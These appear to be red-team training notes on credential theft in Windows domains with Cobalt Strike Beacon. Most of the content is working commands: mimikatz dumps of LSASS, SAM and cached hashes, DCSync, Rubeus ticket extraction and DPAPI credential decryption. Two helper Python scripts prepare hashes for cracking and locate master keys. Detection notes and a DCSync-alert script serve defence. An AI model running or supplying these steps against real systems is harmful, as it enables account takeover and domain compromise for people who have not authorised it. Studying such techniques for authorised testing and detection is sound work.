obtaining credentials
Different forms
- plaintext (username:password)
- hashes (NTLM, AES, DCC, NetNTLM, etc.)
- Kerberos tickets
integrated mimikatz
- every mimikatz command is run in a separate, short-lived process, so nothing carries over between calls; commands that depend on one another have to be combined in a single invocation
- In Cobalt Strike, prefix the command with ! to run it elevated to SYSTEM, or with @ to run it impersonating Beacon's current thread token
beacon> mimikatz !lsadump::sam
NTLM hashes
This module opens a read handle to LSASS, which can be logged as event 4656 (a handle to an object was requested) when object-access auditing with a SACL on LSASS is in place. Use the “Suspicious Handle to LSASS” saved search in Kibana to see them.
beacon> mimikatz !sekurlsa::logonpasswords
beacon> logonpasswords
Dumped credentials are also parsed into View → Credentials.
kerberos encryption keys
beacon> mimikatz !sekurlsa::ekeys
In this case, the AES256 key is the one we want. These keys are not automatically added to the Credentials data model, but they can be added manually via View → Credentials → Add.
security account manager (SAM)
NTLM hashes of local accounts
beacon> mimikatz !lsadump::sam
This module opens a handle to the SAM registry hive. Use the “Suspicious SAM Hive Handle” saved search in Kibana to see them.
domain cached credentials (DCC)
Domain Cached Credentials (DCC) exist so that a user can log on to a machine with domain credentials even while it is disconnected from the domain (think of a roaming laptop). The device caches a hash derived from the domain credentials so that authentication can happen locally; those cached hashes can be extracted and cracked offline to recover plaintext passwords.
beacon> mimikatz !lsadump::cache
These hashes cannot be used for pass-the-hash; their only use is offline cracking. Current systems store the DCC2 (MS-Cache v2) form, which is PBKDF2-HMAC-SHA1 over the NT hash with the lowercase username as salt and 10240 iterations by default, so cracking is slow. Hashcat format (mode 2100): $DCC2$<iterations>#<username>#<hash>
This module will open a handle to the SECURITY registry hive. Use the “Suspicious SECURITY Hive Handle” saved search in Kibana to see them.
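Turning the lsadump::cache output into something hashcat accepts is a small parsing job that is easy to get wrong (the username has to be lowercased, and the iteration count comes from a separate line). The script below is an added example for these notes, not mimikatz, Cobalt Strike or hashcat code; SAMPLE_CACHE_OUTPUT is constructed to mirror the layout mimikatz prints, and its account names and hash values are made up.

```python
"""Turn mimikatz lsadump::cache output into hashcat mode 2100 lines.

Added example for these notes; it is not mimikatz, Cobalt Strike or
hashcat code. SAMPLE_CACHE_OUTPUT is constructed to mirror the layout
mimikatz prints (the account names and hash values are made up).
"""
import re
import sys

# mimikatz prints the PBKDF2 iteration count once, before the entries.
ITERATIONS_RE = re.compile(r"Iteration is set to[^(]*\((\d+)\)")

# One cached entry: "User : DOMAIN\name" followed by "MsCacheV2 : <32 hex>".
ENTRY_RE = re.compile(
    r"User[ \t]*:[ \t]*(?:(?P<domain>[^\\\s]+)\\)?(?P<user>\S+)[ \t]*\r?\n"
    r"[ \t]*MsCacheV2[ \t]*:[ \t]*(?P<hash>[0-9a-fA-F]{32})"
)

# Constructed sample (not real data) in the shape of `mimikatz !lsadump::cache`.
SAMPLE_CACHE_OUTPUT = r"""
Domain : WKSTN-1
SysKey : 1f1e1d1c1b1a19181716151413121110

Local name : WKSTN-1 ( S-1-5-21-569305411-121244042-2357301523 )
Domain name : DEV ( S-1-5-21-569305411-121244042-2357301523 )

* Iteration is set to default (10240)

[NL$1 - 1/2/2023 10:11:12 AM]
RID       : 00000450 (1104)
User      : DEV\bfarmer
MsCacheV2 : 5c6e1a2b3c4d5e6f708192a3b4c5d6e7

[NL$2 - 1/2/2023 10:11:13 AM]
RID       : 00000451 (1105)
User      : DEV\nlamb
MsCacheV2 : A1B2C3D4E5F60718293A4B5C6D7E8F90
"""


def parse_cache_output(text: str) -> list[dict]:
    """Return one dict per cached account, with the iteration count attached."""
    m = ITERATIONS_RE.search(text)
    iterations = int(m.group(1)) if m else 10240  # Windows default
    entries = []
    for e in ENTRY_RE.finditer(text):
        entries.append({
            "domain": e.group("domain"),
            "user": e.group("user"),
            "hash": e.group("hash").lower(),
            "iterations": iterations,
        })
    return entries


def to_hashcat(entry: dict) -> str:
    """DCC2 salts PBKDF2 with the lowercase username, so lowercase it here;
    hashcat will never match the hash otherwise."""
    return f"$DCC2${entry['iterations']}#{entry['user'].lower()}#{entry['hash']}"


def hashcat_lines(text: str) -> list[str]:
    """All cached entries in the text, one hashcat line each."""
    return [to_hashcat(e) for e in parse_cache_output(text)]


if __name__ == "__main__":
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CACHE_OUTPUT
    print("\n".join(hashcat_lines(source)))
    # then: hashcat -m 2100 dcc2.txt rockyou.txt
```

Save the Beacon output to a file and pass its path as the first argument; the result can be fed straight to hashcat -m 2100. Because each DCC2 guess costs 10240 PBKDF2 rounds, start with a targeted wordlist and rules rather than a brute force.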
DCSync
Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background; it takes the domain FQDN and the account to dump (dcsync <domain.fqdn> <DOMAIN\user>).
This requires the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object (the rights checked by the DRSGetNCChanges replication call), which are normally held only by domain controllers and Domain Admins. The technique is included here for completeness, and it will be useful later on.
beacon> make_token DEV\nlamb F3rrari
Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events whose Properties contain the control-access right GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes), 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). Domain controllers replicate with each other legitimately, so exclude the DC computer accounts and alert on everyone else.
Find these using the “Suspicious Directory Replication” saved search in Kibana.
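What the saved search has to do is simple enough to write out: pull the GUIDs from the 4662 Properties field, keep the replication rights, and drop the subjects that are allowed to replicate. The script below is an added example for these notes, not Cobalt Strike, mimikatz or the Kibana search itself. SAMPLE_EVENTS is constructed, and the field names (SubjectUserName, SubjectDomainName, ObjectName, AccessMask, Properties) assume 4662 events forwarded with their EventData fields intact, which is an assumption about the logging pipeline.

```python
"""Flag 4662 events carrying directory-replication control-access rights.

Added example for these notes; it is not Cobalt Strike, mimikatz or the
Kibana saved search the notes refer to. SAMPLE_EVENTS is constructed, and
the field names assume 4662 events forwarded with their EventData fields
intact (an assumption about the logging pipeline).
"""
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended right is exercised

# Properties of a replication request against the domain object: the rights
# used, then the object class (domainDNS). Constructed, not real log data.
DCSYNC_PROPERTIES = (
    "Control Access\n"
    "\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
    "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
    "\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"
)

SAMPLE_EVENTS = [
    # DC-to-DC replication: expected, must not alert.
    {"EventID": 4662, "SubjectDomainName": "DEV", "SubjectUserName": "DC1$",
     "ObjectName": "DC=dev,DC=corp,DC=local", "AccessMask": "0x100",
     "Properties": DCSYNC_PROPERTIES},
    # A user account replicating the domain: DCSync.
    {"EventID": 4662, "SubjectDomainName": "DEV", "SubjectUserName": "nlamb",
     "ObjectName": "DC=dev,DC=corp,DC=local", "AccessMask": "0x100",
     "Properties": DCSYNC_PROPERTIES},
    # A workstation account replicating: not a DC, so still suspicious.
    {"EventID": 4662, "SubjectDomainName": "DEV", "SubjectUserName": "WKSTN-1$",
     "ObjectName": "DC=dev,DC=corp,DC=local", "AccessMask": "0x100",
     "Properties": DCSYNC_PROPERTIES},
    # Ordinary 4662 noise: a property read with no replication right.
    {"EventID": 4662, "SubjectDomainName": "DEV", "SubjectUserName": "nlamb",
     "ObjectName": "CN=bfarmer,OU=Users,DC=dev,DC=corp,DC=local", "AccessMask": "0x10",
     "Properties": "Read Property\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "nlamb"},
]


def replication_rights(properties: str) -> list[str]:
    """Names of the replication rights present in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(properties or "")
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events: list[dict], dc_accounts: list[str]) -> list[dict]:
    """One alert per 4662 that exercises a replication right from anything
    other than a known domain controller computer account."""
    known_dcs = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in known_dcs:
            continue  # DCs replicate with each other constantly
        alerts.append({
            "subject": f"{ev.get('SubjectDomainName', '')}\\{subject}",
            "rights": rights,
            "object": ev.get("ObjectName", ""),
            "control_access": bool(int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, dc_accounts=["DC1$"]):
        print(alert)
```

The allowlist is by account name, not by the trailing $: a workstation or a newly added computer account that suddenly replicates the domain is exactly the kind of subject that should alert. None of this fires unless the Directory Service Access audit subcategory is enabled on the DCs, which is worth checking before relying on the search.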
extracting kerberos tickets
- more about this in Pass-the-Ticket (Kerberos)
# triage lists the tickets in every logon session (LUID) and the service each is for
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# dump extracts a ticket (here the TGT of session 0x7049f) as base64; /nowrap keeps it on one line for copying. Dumping tickets from other users' sessions needs an elevated Beacon.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap
dpapi
DPAPI is used by the Windows Credential Manager to store saved secrets such as RDP credentials, and by third-party applications like Google Chrome to store website credentials.
list credentials in vault
beacon> run vaultcmd /list
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
or use Seatbelt
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault
get encryption key
# list credential files on filesystem
beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles
# the master keys are themselves encrypted and stored per user under the user's SID:
beacon> ls C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104
# get the master key: dump the decrypted master keys cached in LSASS (needs elevation, hence !)
beacon> mimikatz !sekurlsa::dpapi
# or decrypt the master key file with the domain DPAPI backup key, requested from a DC over RPC (MS-BKRP)
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc
The /rpc method only works when executed in the context of the user who owns the key, because the DC will only release it to that user. If your Beacon is running as another user or SYSTEM, you must first impersonate the target user (e.g. with make_token or steal_token), then run the command with the @ modifier so mimikatz uses that token.
decrypt encrypted credentials
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
scheduled task credentials
# List them:
beacon> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
# Get guid of master key:
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E
# dump masterkey
beacon> mimikatz !sekurlsa::dpapi
# then decrypt:
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E /masterkey:10530dda04093232087d35345bfbb4b75db7382ed6db73806f86238f6c3527d830f67210199579f86b0c0f039cd9a55b16b4ac0a3f411edfacc593a541f8d0d9
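The "get guid of master key" step in both DPAPI procedures above works because every credential file carries a DPAPI blob whose header names the master key that protects it. The script below is an added example for these notes, not mimikatz or Cobalt Strike code: it locates that blob in a credential file and reads out the master-key GUID (the guidMasterKey value dpapi::cred prints), the description and the algorithms, so the right file under ...\Protect\<SID>\ can be picked without running mimikatz. The sample file is constructed in the script (no real secret is involved, and the GUID used is the one from the notes); the outer credential-file header layout (version, blob size, reserved) is assumed from public parsers, but the blob finder scans for the DPAPI provider GUID, so it does not rely on that assumption.

```python
"""Read the master-key GUID (and algorithms) out of a DPAPI credential file.

Added example for these notes; it is not mimikatz or Cobalt Strike code.
mimikatz dpapi::cred /in:<file> prints the same guidMasterKey field; this
shows where it comes from. The sample file is constructed (no real secret),
and the outer credential-file header is assumed from public parsers; the
blob finder scans for the DPAPI provider GUID, so it does not rely on it.
"""
import struct
import sys
import uuid

# Every DPAPI blob starts with a 4-byte version followed by this provider GUID.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# CryptoAPI ALG_ID values commonly seen in DPAPI blobs.
ALG_IDS = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
           0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}


def find_dpapi_blob(data: bytes) -> int:
    """Offset of the blob's version field, or -1 if no DPAPI blob is present."""
    idx = data.find(DPAPI_PROVIDER_GUID.bytes_le)
    return idx - 4 if idx >= 4 else -1


def parse_dpapi_blob(data: bytes, offset: int) -> dict:
    """Parse the DPAPI blob header: master key GUID, description, algorithms, salt."""
    version, = struct.unpack_from("<I", data, offset)
    provider = uuid.UUID(bytes_le=data[offset + 4:offset + 20])
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    mk_version, = struct.unpack_from("<I", data, offset + 20)
    mk_guid = uuid.UUID(bytes_le=data[offset + 24:offset + 40])
    flags, desc_len = struct.unpack_from("<II", data, offset + 40)
    pos = offset + 48
    description = data[pos:pos + desc_len].decode("utf-16-le").rstrip("\x00")
    pos += desc_len
    alg_crypt, key_bits, salt_len = struct.unpack_from("<III", data, pos)
    pos += 12
    salt = data[pos:pos + salt_len]
    pos += salt_len
    strong_len, = struct.unpack_from("<I", data, pos)   # HMAC key, usually empty
    pos += 4 + strong_len
    alg_hash, hash_bits = struct.unpack_from("<II", data, pos)
    return {
        "master_key_guid": str(mk_guid),
        "master_key_version": mk_version,
        "flags": flags,
        "description": description,
        "alg_crypt": ALG_IDS.get(alg_crypt, hex(alg_crypt)),
        "key_bits": key_bits,
        "salt": salt.hex(),
        "alg_hash": ALG_IDS.get(alg_hash, hex(alg_hash)),
        "hash_bits": hash_bits,
    }


def credential_master_key(data: bytes) -> str:
    """The master-key GUID a credential file needs, as mimikatz would report it."""
    offset = find_dpapi_blob(data)
    if offset < 0:
        raise ValueError("no DPAPI blob found in file")
    return parse_dpapi_blob(data, offset)["master_key_guid"]


def master_key_file(profile_dir: str, sid: str, mk_guid: str) -> str:
    """Path of the user's encrypted master key for that GUID."""
    return f"{profile_dir}\\AppData\\Roaming\\Microsoft\\Protect\\{sid}\\{mk_guid}"


def build_sample_credential_file(mk_guid: str, description: str) -> bytes:
    """Construct a credential file with a DPAPI blob header (sample, not a real secret)."""
    desc = description.encode("utf-16-le") + b"\x00\x00"
    salt = bytes(range(32))
    ciphertext = b"\xaa" * 48                                   # dummy, never decrypted
    blob = struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
    blob += struct.pack("<I", 1) + uuid.UUID(mk_guid).bytes_le
    blob += struct.pack("<II", 0, len(desc)) + desc
    blob += struct.pack("<III", 0x6610, 256, len(salt)) + salt  # AES-256, salt
    blob += struct.pack("<I", 0)                                # no HMAC key
    blob += struct.pack("<II", 0x800E, 512)                     # SHA-512
    blob += struct.pack("<I", 0)                                # hmac
    blob += struct.pack("<I", len(ciphertext)) + ciphertext
    blob += struct.pack("<I", 0)                                # signature
    # Assumed outer header: version 1, blob length, reserved 0.
    return struct.pack("<III", 1, len(blob), 0) + blob


if __name__ == "__main__":
    if len(sys.argv) > 1:
        data = open(sys.argv[1], "rb").read()
    else:
        data = build_sample_credential_file("bfc5090d-22fe-4058-8953-47f6882f549e",
                                            "Local Credential Data")
    info = parse_dpapi_blob(data, find_dpapi_blob(data))
    for key, value in info.items():
        print(f"{key:>19}: {value}")
```

Run it with a downloaded credential file as the argument (or with no argument to parse the constructed sample). The master-key GUID it reports is the filename to look for under the owner's Protect\<SID> directory, or under C:\Windows\System32\Microsoft\Protect\S-1-5-18 for the SYSTEM-owned scheduled task credentials; the decryption itself still needs the decrypted master key from sekurlsa::dpapi or dpapi::masterkey.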
password cracking
- john the ripper, hashcat
- wordlist: rockyou